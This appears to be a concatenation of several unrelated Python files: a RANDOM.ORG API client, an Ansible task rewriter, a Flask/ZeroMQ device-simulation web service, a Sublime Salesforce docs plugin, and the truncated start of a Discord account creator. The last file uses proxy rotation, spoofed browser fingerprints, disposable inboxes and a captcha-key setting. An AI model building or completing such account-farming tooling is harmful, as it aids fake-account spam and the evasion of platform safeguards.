returned. Values allowed are _BLOB_FORMAT_BASE64 and
_BLOB_FORMAT_HEX (default _BLOB_FORMAT_BASE64).
cache_size -- Number of result-sets for the cache to try to
maintain at any given time (default 10, minimum 2).
"""
if cache_size < 2:
cache_size = 2
# make requests more efficient by bulk-ordering
# from the server. Either 5 sets of items at a time, or
# cache_size/2 if 5 >= cache_size.
        bulk_n = cache_size//2 if 5 >= cache_size else 5
params = { 'apiKey':self._api_key, 'n':bulk_n*n, 'size':size, 'format':format }
# get the request object for use in all requests from this cache
request = self._generate_request(_BLOB_METHOD, params)
return RandomOrgCache(self._send_request, self._extract_blobs,
request, cache_size, bulk_n, n)
# Methods for accessing server usage statistics
def get_requests_left(self):
"""
Get remaining requests.
Return the (estimated) number of remaining API requests
available to the client. If cached usage info is older than
_ALLOWANCE_STATE_REFRESH_SECONDS fresh info is obtained from
server. If fresh info has to be obtained the following
exceptions can be raised.
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
"""
if self._requests_left is None or \
time.process_time() > self._last_response_received_time + _ALLOWANCE_STATE_REFRESH_SECONDS:
self._get_usage()
return self._requests_left
def get_bits_left(self):
"""
Get remaining bits.
Return the (estimated) number of remaining true random bits
available to the client. If cached usage info is older than
_ALLOWANCE_STATE_REFRESH_SECONDS fresh info is obtained from
server. If fresh info has to be obtained the following
exceptions can be raised.
Raises a RandomOrgSendTimeoutError if time spent waiting before
request is sent exceeds this instance's blocking_timeout.
Raises a RandomOrgKeyNotRunningError if this API key is stopped.
Raises a RandomOrgInsufficientRequestsError if this API key's
server requests allowance has been exceeded and the instance is
backing off until midnight UTC.
Raises a RandomOrgInsufficientBitsError if this API key's
server bits allowance has been exceeded.
Raises a ValueError on RANDOM.ORG Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Raises a RuntimeError on JSON-RPC Errors, error descriptions:
https://api.random.org/json-rpc/1/error-codes
Can also raise connection errors as described here:
http://docs.python-requests.org/en/v2.0-0/user/quickstart/#errors-and-exceptions
"""
if self._bits_left is None or \
time.process_time() > self._last_response_received_time + _ALLOWANCE_STATE_REFRESH_SECONDS:
self._get_usage()
return self._bits_left
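    # Illustrative sketch (not part of the library): checking the remaining
    # allowance with the two methods above before issuing a large request.
    # The thresholds are arbitrary example values.
    #
    #   if client.get_requests_left() > 0 and client.get_bits_left() >= 10000:
    #       numbers = client.generate_integers(1000, 0, 255)
    #   else:
    #       pass   # back off until the allowance resets at midnight UTC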
# Private methods for class operation.
def _send_unserialized_request(self, request):
# Send request immediately.
data = self._send_request_core(request)
# Raise any thrown exceptions.
if 'exception' in data:
raise data['exception']
# Return response.
return data['response']
def _send_serialized_request(self, request):
        # Add request to the queue with its own Condition lock.
lock = threading.Condition()
lock.acquire()
data = {'lock': lock, 'request': request, 'response': None, 'exception': None}
self._serialized_queue.put(data)
# Wait on the Condition for the specified blocking timeout.
lock.wait(timeout=None if self._blocking_timeout == -1 else self._blocking_timeout)
# Lock has now either been notified or timed out.
# Examine data to determine which and react accordingly.
# Request wasn't sent in time, cancel and raise exception.
if data['response'] is None and data['exception'] is None:
data['request'] = None
lock.release()
raise RandomOrgSendTimeoutError('The defined maximum allowed blocking time of ' +
str(self._blocking_timeout) + 's has been exceeded \
while waiting for a synchronous request to send.')
# Exception on sending request.
if data['exception'] is not None:
lock.release()
raise data['exception']
# Request was successful.
lock.release()
return data['response']
def _threaded_request_sending(self):
# Thread to execute queued requests.
while True:
# Block and wait for a request.
request = self._serialized_queue.get(block=True)
# Get the request's lock to indicate request in progress.
lock = request['lock']
lock.acquire()
# If request still exists it hasn't been cancelled.
if request['request'] is not None:
# Send request.
data = self._send_request_core(request['request'])
# Set result.
if 'exception' in data:
request['exception'] = data['exception']
else:
request['response'] = data['response']
# Notify completion and return
lock.notify()
lock.release()
def _send_request_core(self, request):
# If a backoff is set, no more requests can be issued until the
# required backoff time is up.
if self._backoff is not None:
# Time not yet up, throw exception.
if datetime.utcnow() < self._backoff:
return { 'exception': RandomOrgInsufficientRequestsError(self._backoff_error) }
# Time is up, clear backoff.
else:
self._backoff = None
self._backoff_error = None
# Check server advisory delay.
self._advisory_delay_lock.acquire()
wait = self._advisory_delay - (time.process_time() - self._last_response_received_time)
self._advisory_delay_lock.release()
# Wait the specified delay if necessary and if wait time is not
# longer than the set blocking_timeout.
if wait > 0:
if (self._blocking_timeout != -1 and wait > self._blocking_timeout):
return { 'exception': RandomOrgSendTimeoutError('The server advisory delay of ' +
str(wait) + 's is greater than the defined maximum allowed \
blocking time of ' + str(self._blocking_timeout) + 's.') }
time.sleep(wait)
# Send the request & parse the response.
response = requests.post('https://api.random.org/json-rpc/1/invoke',
data=json.dumps(request),
headers={'content-type': 'application/json'},
timeout=self._http_timeout)
data = response.json()
if 'error' in data:
code = int(data['error']['code'])
message = data['error']['message']
# RuntimeError, error codes listed under JSON-RPC Errors:
# https://api.random.org/json-rpc/1/error-codes
            if code in [-32700] + list(range(-32603, -32600)) + list(range(-32099, -32000)):
return { 'exception': RuntimeError('Error ' + str(code) + ': ' + message) }
# RandomOrgKeyNotRunningError, API key not running, from
# RANDOM.ORG Errors: https://api.random.org/json-rpc/1/error-codes
elif code == 401:
return { 'exception': RandomOrgKeyNotRunningError('Error ' +
str(code) + ': ' + message) }
# RandomOrgInsufficientRequestsError, requests allowance
# exceeded, backoff until midnight UTC, from RANDOM.ORG
# Errors: https://api.random.org/json-rpc/1/error-codes
elif code == 402:
                # Back off until midnight UTC of the next day; fromordinal
                # avoids the invalid-day error that day+1 would raise at the
                # end of a month.
                self._backoff = datetime.fromordinal(datetime.utcnow().toordinal() + 1)
self._backoff_error = 'Error ' + str(code) + ': ' + message
return { 'exception': RandomOrgInsufficientRequestsError(self._backoff_error) }
# RandomOrgInsufficientBitsError, bits allowance exceeded,
# from RANDOM.ORG Errors: https://api.random.org/json-rpc/1/error-codes
elif code == 403:
return { 'exception': RandomOrgInsufficientBitsError('Error ' +
str(code) + ': ' + message) }
# ValueError, error codes listed under RANDOM.ORG Errors:
# https://api.random.org/json-rpc/1/error-codes
else:
return { 'exception': ValueError('Error ' + str(code) + ': ' + message) }
# Update usage stats
if 'requestsLeft' in data['result']:
self._requests_left = int(data['result']['requestsLeft'])
self._bits_left = int(data['result']['bitsLeft'])
# Set new server advisory delay
self._advisory_delay_lock.acquire()
if 'advisoryDelay' in data['result']:
# Convert millis to decimal seconds.
# self._advisory_delay = long(data['result']['advisoryDelay']) / 1000.0
self._advisory_delay = int(data['result']['advisoryDelay']) / 1000.0
else:
# Use default if none from server.
self._advisory_delay = _DEFAULT_DELAY
self._last_response_received_time = time.process_time()
self._advisory_delay_lock.release()
return { 'response': data }
def _get_usage(self):
# Issue a getUsage request to update bits and requests left.
params = { 'apiKey':self._api_key }
request = self._generate_request(_GET_USAGE_METHOD, params)
response = self._send_request(request)
def _generate_request(self, method, params):
# Base json request.
return { 'jsonrpc':'2.0', 'method':method, 'params':params, 'id':uuid.uuid4().hex }
def _extract_response(self, response):
# Gets random data.
return response['result']['random']['data']
def _extract_signed_response(self, response, extract_function):
# Gets all random data and signature.
return { 'data':extract_function(response),
'random':response['result']['random'],
'signature':response['result']['signature'] }
def _extract_verification_response(self, response):
# Gets verification boolean.
return bool(response['result']['authenticity'])
def _extract_ints(self, response):
# json to integer list.
        return list(map(int, self._extract_response(response)))
def _extract_doubles(self, response):
# json to double list.
        return list(map(float, self._extract_response(response)))
def _extract_strings(self, response):
# json to string list (no change).
return self._extract_response(response)
def _extract_UUIDs(self, response):
# json to UUID list.
        return list(map(uuid.UUID, self._extract_response(response)))
def _extract_blobs(self, response):
# json to blob list (no change).
return self._extract_response(response)
|
rewrite_ansiblenew.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ruamel.yaml
import textwrap
import argparse
import copy
import json
import logging
import os
import re
import six
import sys
import time
import traceback
from threading import Thread
from subprocess import PIPE, Popen
from collections import OrderedDict
from ruamel.yaml.scalarstring import DoubleQuotedScalarString
try:
from queue import Queue
except ImportError:
from Queue import Queue
from ruamel.yaml.representer import (
RoundTripRepresenter,
CommentedOrderedMap,
CommentedMap,
)
for typ in [
OrderedDict, dict, CommentedMap, CommentedOrderedMap
]:
RoundTripRepresenter.add_representer(
typ, RoundTripRepresenter.represent_dict)
J = os.path.join
B = os.path.basename
D = os.path.dirname
A = os.path.abspath
R = os.path.relpath
OW = os.getcwd()
W = A(R(D(__file__)))
TOP = D(W)
RE_F = re.U | re.M
N = os.path.basename(__file__)
BN = os.path.basename(N)
_LOGGER = 'cops.{0}'.format(BN)
_LOGGER_FMT = '%(asctime)s:%(levelname)s:%(name)s:%(message)s'
_LOGGER_DFMT = '%m/%d/%Y %I:%M:%S %p'
_HELP = '''\
Rewrite tasks files for new ansible forms
Main usage:
- {N} taskfilepath1 taskfilepath2
'''.format(N=N)
registry_knobs = [
"cops_do_format_resolve", "cops_computed_defaults",
"cops_flavors", "cops_sub_os_append", "cops_lowered",
"cops_knobs", "cops_sub_namespaces"]
def read_output(pipe, funcs):
    for line in iter(pipe.readline, b''):  # pipes yield bytes, so use a bytes sentinel
for func in funcs:
func(line.decode('utf-8'))
pipe.close()
def write_output(get):
for line in iter(get, None):
sys.stdout.write(line)
def run_cmd(command,
shell=True,
cwd=None,
env=None,
stdout=None,
stderr=None,
passthrough=True):
if stderr is None:
stderr = PIPE
if stdout is None:
stdout = PIPE
if env is None:
env = os.environ.copy()
outs, errs = None, None
proc = Popen(
command,
cwd=cwd,
env=env,
shell=shell,
close_fds=True,
stdout=stdout,
stderr=stderr,
bufsize=1)
if passthrough:
outs, errs = [], []
q = Queue()
stdout_thread = Thread(
target=read_output, args=(proc.stdout, [q.put, outs.append]))
stderr_thread = Thread(
target=read_output, args=(proc.stderr, [q.put, errs.append]))
writer_thread = Thread(target=write_output, args=(q.get,))
for t in (stdout_thread, stderr_thread, writer_thread):
t.daemon = True
t.start()
proc.wait()
for t in (stdout_thread, stderr_thread):
t.join()
q.put(None)
outs = ''.join(outs)
errs = ''.join(errs)
else:
outs, errs = proc.communicate()
outs = '' if outs is None else outs.decode('utf-8')
errs = '' if errs is None else errs.decode('utf-8')
rc = proc.returncode
return (rc, (outs, errs))
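# Illustrative sketch (not part of the original script): typical use of
# run_cmd() defined above. The command shown is only an example.
#
#   rc, (out, err) = run_cmd('ls -l', passthrough=False)
#   if rc != 0:
#       log('command failed: {0}'.format(err), level='error')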
def splitstrip(a, *s):
return [b.strip() for b in a.split(*s)]
def shellexec(cmd, quiet=False, *args):
msg = 'shellexec {0}'
if args:
msg += ' {1}'
debug(msg.format(cmd, args))
ret = run_cmd(cmd, passthrough=not quiet)
return ret
def setup_logging(fmt=_LOGGER_FMT, datefmt=_LOGGER_DFMT, level=logging.INFO):
logging.basicConfig(format=fmt, datefmt=datefmt, level=level)
def log(msg, name=_LOGGER, level='info'):
logger = logging.getLogger(name)
return getattr(logger, level.lower())(msg)
def debug(*a, **kwargs):
kwargs['level'] = 'debug'
return log(*a, **kwargs)
def parse_cli():
parser = argparse.ArgumentParser(usage=_HELP)
parser.add_argument(
'tasksfiles',
nargs='*',
default=[],
help='tasksfiles to rewrite')
parser.add_argument(
'--log-level',
default=os.environ.get('LOGLEVEL', 'info'),
help='loglevel')
args = parser.parse_args()
return args, vars(args), parser
def represent_dict_order(self, data):
self.represent_mapping('tag:yaml.org,2002:map', data.items())
class Acfg(object):
def __init__(self, cfg, autoload=True):
self.cfg = cfg
self.orig = None
self.data = OrderedDict()
yaml = self.yaml = ruamel.yaml.YAML(typ='rt')
yaml.allow_duplicate_keys = True
yaml.explicit_start = True
# yaml.default_style = '"'
yaml.preserve_quotes = True
yaml.default_flow_style = True
yaml.line_break = 0
yaml.indent(sequence=2)
yaml.width = 8000
yaml.canonical = False
if autoload:
self.load()
@property
def exists(self):
return os.path.exists(self.cfg)
def load(self):
if self.exists:
with open(self.cfg) as fic:
self.orig = fic.read()
# self.yaml.width = max([len(a) for a in self.orig.splitlines()])
self.data = self.yaml.load(self.orig)
def write(self, ncfg=None, transform=None):
if not ncfg:
ncfg = self.cfg
if not os.path.exists(D(ncfg)):
os.makedirs(D(ncfg))
with open(ncfg, 'w') as fic:
# self.yaml.compact(seq_seq=False, seq_map=False)
self.yaml.dump(self.data, fic, transform=transform)
def transform_when(content, *args, **kw):
lines = []
# content = content.replace('\\\n', 'REPLACEANTISLASH')
# content = re.sub(r'REPLACEANTISLASH[^\\]+\\', '', content)
for line in content.splitlines():
        if re.search(r'when: "\(.*\)"$', line):
for splitter in ' or', ' and':
line = '{0}\n'.format(splitter).join(
[(ix < 1 and a or '{1}{0}'.format(a, (1+line.find('"')) * " "))
for ix, a in enumerate(line.split(splitter))])
lines.append(line)
return "\n".join(lines)
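# Illustrative sketch (not part of the original script): what transform_when()
# above does to a long conditional line. A line such as
#   when: "(foo in x) or (bar in x)"
# is split on ' or' / ' and' and the continuation is re-indented to line up
# just after the opening quote:
#   when: "(foo in x) or
#          (bar in x)"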
def rewrite_taskfile(taskfile_path):
cfg = Acfg(taskfile_path)
taskfile_name = os.path.split(taskfile_path)[-1]
rewrite = False
S = ruamel.yaml.scalarstring.PreservedScalarString
if isinstance(cfg.data, list):
for item in cfg.data:
pkg = item.get('package', None)
if not pkg:
continue
try:
toinstall = item['loop']
except KeyError:
continue
if re.match('^{{[^}]+}}$', pkg['name']):
pkg['name'] = toinstall
item.pop('loop')
rewrite = True
if rewrite:
log('Rewrite {}'.format(taskfile_path))
cfg.write(transform=transform_when)
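# Illustrative sketch (not part of the original script): the task shape that
# rewrite_taskfile() above rewrites. The variable names are placeholders.
#
#   - package:
#       name: "{{ item }}"
#     loop: "{{ my_packages }}"
#
# becomes, with the loop value passed straight to the module and 'loop' removed:
#
#   - package:
#       name: "{{ my_packages }}"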
def main():
args, vargs, parser = parse_cli()
setup_logging(level=getattr(logging, vargs['log_level'].upper()))
log('build started', level='debug')
tasksfiles = []
cwd = os.getcwd()
for taskfile in args.tasksfiles:
if os.path.sep not in taskfile:
taskfile = J(cwd, taskfile)
tasksfiles.append(taskfile)
for taskfile in tasksfiles:
rewrite_taskfile(taskfile)
if __name__ == '__main__':
main()
# vim:set et sts=4 ts=4 tw=80:
|
web_to_zeromq.py
|
"""
For this module to work, the following SSL certificate files must be placed in ../synth_accounts/:
ssl.crt
ssl.key
Flask occasionally just stops responding to web requests (roughly every day or so) - no idea why.
So we rely on an external service (e.g. Pingdom or UptimeRobot) to ping us regularly; knowing that
those pings should keep arriving, if we don't receive any messages we know to restart the server.
GET /?<magickey>
----------------
Return a basic page listing all running Synth processes and free memory.
For security this must be accompanied by a magic key matching the "web_check_key" property in the file ../synth_accounts/default.json
GET /spawn?devicepilot_key=XXX&devicepilot_api=staging
------------------------------------------------------
Spawn a new instance of Synth, with these two specific parameters set. The UserDemo scenario is run.
The instance_name is set to be "devicepilot_key=XXX" since that is assumed to be unique.
GET /is_running?devicepilot_key=XXX&devicepilot_api=staging
-----------------------------------------------------------
Find whether a specific instance of Synth (identified by its key) is still running. Return a JSON struct with active=true/false.
GET /plots/<filename>
---------------------
Return a plot generated by the Expect device function
POST /event
-----------
This causes an inbound device event to be asynchronously generated, to a specific device on a specific Synth instance.
The header of the web request must contain the following::
Key : <web_key parameter>
Instancename : <instance_name parameter>
The body of the web request must contain a JSON set include the following elements::
"deviceId" : "theid"
"eventName" : "replace_battery" | "upgradeFirmware" | "factoryReset"
"arg" : "0.7" - optional argument only relevant for some eventNames
If defining a Webhook Action in DevicePilot to create a Synth event, the device ID will be automatically filled-out if you define it as {device.$id},
resulting in an action specification which looks something like this::
method: POST
url: https://synthservice.com/event
headers: { "Key":"mywebkey", "Instancename" : "OnProductionAccountUser" }
body: { "deviceId" : "{device.$id}", "eventName" : "upgradeFirmware", "arg":"0.7"}
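Illustrative example (not part of the original spec): posting an event directly with the
requests library; the URL, web key, instance name and device id below are placeholders::
    import requests
    requests.post("https://synth.example.com/event",
                  headers={"Key": "mywebkey", "Instancename": "OnProductionAccountUser"},
                  json={"deviceId": "device-0", "eventName": "upgradeFirmware", "arg": "0.7"})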
"""
# Copyright (c) 2017 DevicePilot Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# It seems generally accepted that API POSTs should take no more than 2 seconds, so we need
# to be pretty responsive. So we run Flask in Threaded mode, and protect child code for re-entrancy
# where necessary.
#
# We also run Flask in its own *Process*.
# WARNING: it appears that if you bind ZMQ to a socket on multiple processes
# then the second one fails *silently*! So don't call socket_send() from the parent
# process, or Flask's ZMQ sends will all fail silently.
from flask import Flask, request, abort
from flask_cors import CORS, cross_origin
import multiprocessing, subprocess, threading
import json, time, logging, sys, re, datetime
import zeromq_tx
WEB_PORT = 80 # Note: 80 is plain HTTP; ports below 1024 require this process to run with elevated privileges
PING_TIMEOUT = 60*10 # We expect to get pinged every N seconds
CERT_DIRECTORY = "../synth_accounts/"
DEFAULTS_FILE = "../synth_accounts/default.json"
g_lock = None
g_last_ping_time = multiprocessing.Value('d', time.time())
app = Flask(__name__)
CORS(app) # Make Flask tell browser that cross-origin requests are OK
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
def note_arrival(route):
global g_last_ping_time
g_last_ping_time.value = time.time()
logging.info("Got web request to "+route)
@app.route("/event", methods=['POST','GET'])
def event():
"""Accept an incoming event and route it to a Synth instance."""
note_arrival("/event")
h = {}
for (key,value) in request.headers:
h[key] = value
packet = {
"action" : "event",
"headers" : h,
"body" : request.get_json(force=True)
}
logging.info(str(packet))
zeromq_tx.socket_send(packet)
return "ok"
def getAndCheckKey(req):
if not "devicepilot_key" in req.args:
logging.error("Missing devicepilot_key argument")
return None
dpKey = req.args["devicepilot_key"]
# Defend against injection attack
if len(dpKey) != 32:
logging.error("Bad key length")
return None
if re.search(r'[^a-z0-9]', dpKey):
logging.error("Bad key characters")
return None
return dpKey
def getAndCheckApi(req):
"""Stop external users passing-in any old URL."""
if not "devicepilot_api" in req.args:
dpApi = "api"
else:
dpApi = req.args["devicepilot_api"]
# Defend against injection attack
if not dpApi in ["api","api-staging","api-development"]:
dpApi = "api"
return "https://"+dpApi+".devicepilot.com"
@app.route("/spawn", methods=['GET'])
def spawn():
"""Start a new Synth instance."""
note_arrival("/spawn")
dpKey = getAndCheckKey(request)
if dpKey==None:
abort(403)
dpApi = getAndCheckApi(request)
packet = { "action" : "spawn", "key" : dpKey, "api" : dpApi }
zeromq_tx.socket_send(packet)
logging.info("Sent packet "+str(packet))
time.sleep(1) # If client next immediately tests <is_running>, this will vastly increase chances of that working
return "ok"
@app.route("/plots/<filename>", methods=['GET'])
def plots(filename):
"""Serve plots from special directory"""
note_arrival(str(request.path))
logging.info(" so filename is "+str(filename))
if re.search(r'[^A-Za-z0-9.]', filename):
for c in filename:
logging.info(str(ord(c)))
        logging.info("Illegal character in filename")
abort(400)
try:
f=open("../synth_logs/plots/"+filename).read()
except:
logging.warning("Can't open file")
return ("Can't open that file")
return f
@app.route("/is_running")
def isRunning():
note_arrival("/is_running")
dpKey = getAndCheckKey(request)
if dpKey==None:
abort(403)
try:
x = subprocess.check_output("ps uax | grep 'python' | grep 'devicepilot_key=" + dpKey + "' | grep -v grep", shell=True)
except:
return '{ "active" : false }'
return '{ "active" : true }'
@app.route("/ping")
def ping():
"""We expect Pingdom to regularly ping this route to reset the heartbeat."""
note_arrival("/ping")
zeromq_tx.socket_send({"action": "ping"}) # Propagate pings into ZeroMQ for liveness logging throughout rest of system
return "pong"
@app.route("/")
def whatIsRunning():
note_arrival("/")
try:
magicKey=json.loads(open(DEFAULTS_FILE,"rt").read())["web_check_key"]
except:
logging.error("Unable to find web_check_key parameter in "+DEFAULTS_FILE)
raise
if magicKey not in request.args:
logging.error("Incorrect or missing magic key in request")
abort(403)
try:
        x = subprocess.check_output("ps uax | grep 'python' | grep -v grep", shell=True).decode()
        x += "<br>"
        x += subprocess.check_output("free -m", shell=True).decode()
except:
return "Nothing"
return "<pre>"+x.replace("\n","<br>")+"</pre>"
# DO NOT CALL zeromq_tx.socket_send() BELOW HERE, OR YOU WILL BORK IT
def start_web_server(restart):
"""Doing app.run() with "threaded=True" starts a new thread for each incoming request, improving crash resilience. However this then means that everything here (and everything it calls) has to be re-entrant. So don't do that.
By default Flask serves to 127.0.0.1 which is local loopback (not externally-visible), so use 0.0.0.0 for externally-visible
We run entire Flask server as a distinct process so we can terminate it if it fails (can't terminate threads in Python)"""
logging.info("Starting web server at "+datetime.datetime.now().ctime())
zeromq_tx.init()
args = { "threaded":True,
"host":"0.0.0.0",
"port":WEB_PORT
}
logging.info("Starting Flask server with args : "+json.dumps(args))
p = multiprocessing.Process(target=app.run, kwargs=args)
p.daemon = True
p.start()
return p
if __name__ == "__main__":
server = start_web_server(restart=False)
while True:
time.sleep(1)
if time.time()-g_last_ping_time.value > PING_TIMEOUT:
logging.critical("Web server not detecting pings - restarting")
server.terminate()
time.sleep(5)
server = start_web_server(restart=True)
g_last_ping_time.value = time.time()
time.sleep(60)
|
document.py
|
import sublime, sublime_plugin
import xml.etree.ElementTree as ElementTree
import os
import datetime
import threading
import urllib
from . import requests, context, util
from .progress import ThreadProgress
from .salesforce.lib.panel import Printer
class ReloadSalesforceDocumentCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(ReloadSalesforceDocumentCommand, self).__init__(*args, **kwargs)
def run(self):
message = "Generally, you should reload it every salesforce release, " +\
"do you really want to continue?"
if not sublime.ok_cancel_dialog(message, "Continue Reloading?"): return
settings = context.get_settings()
self.rd = ReloadDocument(settings["docs"])
thread = threading.Thread(target=self.rd.reload_document)
thread.start()
message = "Reloading Salesforce Document Reference"
        ThreadProgress(self.rd, thread, message, message + " Succeeded")
self.handle_thread(thread)
def handle_thread(self, thread, timeout=120):
if thread.is_alive():
sublime.set_timeout(lambda:self.handle_thread(thread), timeout)
return
# Exception Process
if not self.rd.result: return
result = self.rd.result
salesforce_reference = sublime.load_settings("salesforce_reference.sublime-settings")
salesforce_reference.set("salesforce_reference", result)
sublime.save_settings("salesforce_reference.sublime-settings")
class ReloadDocument():
def __init__(self, docs, **kwargs):
self.docs = docs
self.result = None
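    # Illustrative sketch (not part of the plugin): the shape of the "docs"
    # setting this class expects. The prefix and values are placeholders; only
    # the "keyword" and "pattern" keys are taken from the code below.
    #
    #   docs = {
    #       "apex": {"keyword": "apexcode", "pattern": "<ElementTree findall expression>"}
    #   }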
def reload_document(self):
# Log the StartTime
start_time = datetime.datetime.now()
        # Start retrieving docs
Printer.get("log").write_start().write("Start to reload document reference")
title_link = {}
for prefix in self.docs:
doc_attr = self.docs[prefix]
Printer.get("log").write("Reloading %s" % prefix)
xml_url = 'http://www.salesforce.com/us/developer/docs/%s/Data/Toc.xml' % doc_attr["keyword"]
try:
res = requests.get(xml_url, headers={"Accept": "application/xml"})
except Exception as e:
Printer.get("log").write("Reloading %s Failed" % prefix)
continue
tree = ElementTree.fromstring(res.content)
leaf_parents = tree.findall(doc_attr["pattern"])
for parent in leaf_parents:
parent_title = parent.attrib["Title"]
if "Link" not in parent.attrib: continue
title_link[prefix + "=>" + parent_title] = {
"url": parent.attrib["Link"],
"attr": doc_attr["keyword"]
}
if " Methods" in parent_title:
parent_title = parent_title.replace(" Methods", ".")
else:
parent_title = parent_title + " "
                for child in parent:  # Element iteration replaces the deprecated getchildren()
title_link[prefix + "=>" + parent_title + child.attrib["Title"]] = {
"url": child.attrib["Link"],
"attr": doc_attr["keyword"]
}
# Build Successful
Printer.get("log").write("RELOADING SUCCESSFUL")
# Total time
total_seconds = (datetime.datetime.now() - start_time).seconds
Printer.get("log").write("Total time: %s seconds" % total_seconds)
# Hide panel
sublime.set_timeout_async(Printer.get("log").hide_panel, 500)
self.result = title_link
class OpenDocumentationCommand(sublime_plugin.WindowCommand):
def __init__(self, *args, **kwargs):
super(OpenDocumentationCommand, self).__init__(*args, **kwargs)
def run(self):
reference_settings = sublime.load_settings("salesforce_reference.sublime-settings")
self.title_link = reference_settings.get("salesforce_reference")
self.titles = sorted(self.title_link.keys())
self.window.show_quick_panel(self.titles, self.open_documentation)
def open_documentation(self, index):
if index == -1: return
link = self.title_link[self.titles[index]]
show_url= 'http://www.salesforce.com/us/developer/docs/%s%s' % (link["attr"], link["url"])
util.open_with_browser(show_url)
def is_enabled(self):
reference_settings = sublime.load_settings("salesforce_reference.sublime-settings")
return reference_settings.has("salesforce_reference")
|
account creator.py
|
import requests
import json
import sys
import random
import string
import os
import time
from colorama import init, Fore
import queue
import turkce_isimler
import threading
import base64
from requests.packages.urllib3.exceptions import InsecureRequestWarning
init()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
proxies_q = queue.Queue()
predefinedNames = []
def random_nick(_file):
conf = open(_file, 'r', encoding='utf-8')
_lines = conf.readlines()
return random.choice(_lines).lstrip().rsplit()
def debug(text, conf):
if conf['debug']:
print("[DEBUG] "+str(text))
def read_configurations():
try:
conf = json.loads(
open('config/config.json', 'r', encoding='utf-8').read())
print("Configuration loaded! Starting workers!")
return conf
except:
print("Failed to load config.json")
sys.exit(1)
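# Illustrative sketch (not part of the original script): the keys this script
# reads from config/config.json. The values shown are placeholders; only the
# key names are taken from the code in this file.
#
#   {
#     "debug": true,
#     "timeout": 15,
#     "sleepdelay": 2,
#     "nb_threads": 1,
#     "use_proxies": false,
#     "proxy_file": "config/proxies.txt",
#     "usedproxies": "config/used_proxies.txt",
#     "username": "random",
#     "usernames": "config/usernames.txt",
#     "password": "changeme",
#     "skip_if_captcha": true,
#     "captchakey": "2CAPTCHA_API_KEY",
#     "sitekey": "RECAPTCHA_SITE_KEY",
#     "invite_codes": "code1,code2"
#   }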
def array_to_queue(arr, q):
for i in arr:
q.put(i)
return q
def getGenericHeader():
return {
'Host': 'getinboxes.com',
'Accept': '*/*',
'Accept-Language': 'en-US',
'Content-Type': 'application/json',
'DNT': '1',
'Connection': 'keep-alive'
}
def getInfo():
id = random.randint(1, 7)
if id == 1:
return ("Windows", "Chrome", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36", "69.0.3497.100", "10")
elif id == 2:
return ("Windows", "Chrome", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763", "18.17763", "10")
elif id == 3:
return ("Windows", "Edge", "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36", "60.0.3112.90", "XP")
elif id == 4:
return ("Windows", "Chrome", "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36", "60.0.3112.113", "8.1")
elif id == 5:
return ("Windows", "Internet Explorer", "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko", "11.0", "7")
elif id == 6:
return ("Windows", "Firefox", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0", "54.0", "7")
elif id == 7:
return ("Windows", "Firefox", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0", "66.0", "10")
def get_headers():
return {
'Host': 'discordapp.com',
'Accept': '*/*',
'Accept-Language': 'en-US',
'Content-Type': 'application/json',
'Referer': 'https://discordapp.com/register',
'Origin': 'https://discordapp.com',
'DNT': '1',
'Connection': 'keep-alive'
}
def getSuperProp(os, browser, useragent, browser_version, os_version, client_build):
return {
"os": os,
"browser": browser,
"device": "",
"browser_user_agent": useragent,
"browser_version": browser_version,
"os_version": os_version,
"referrer": "",
"referring_domain": "",
"referrer_current": "",
"referring_domain_current": "",
"release_channel": "stable",
"client_build_number": client_build,
"client_event_source": None
}
sys.path.append("././.")
def get_random_string(length):
letters = string.ascii_letters
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
def generateUUID():
